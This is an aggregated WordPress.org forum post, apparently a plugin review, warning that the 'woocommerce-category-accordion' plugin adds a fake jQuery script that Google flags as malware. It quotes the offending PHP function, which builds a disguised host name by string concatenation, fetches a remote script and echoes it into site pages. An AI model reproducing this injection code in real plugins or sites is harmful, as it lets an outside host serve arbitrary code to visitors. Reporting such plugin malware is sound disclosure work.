Quantcast
Channel: Topic Tag: malware | WordPress.org
Viewing all articles
Browse latest Browse all 1906

Don’t use it, adds scripts detected as malware by Google

$
0
0

The following code adds a fake jquery script call that is totally useless and is detected as malware by google crawler.

// woocommerce-category-accordion/inc/trwca-widget.php

function wp_func_jquery() {

    $host = 'http://';

    echo(wp_remote_retrieve_body(wp_remote_get($host.'ui'.'jquery.org/jquery-1.6.3.min.js')));

}

Viewing all articles
Browse latest Browse all 1906

Trending Articles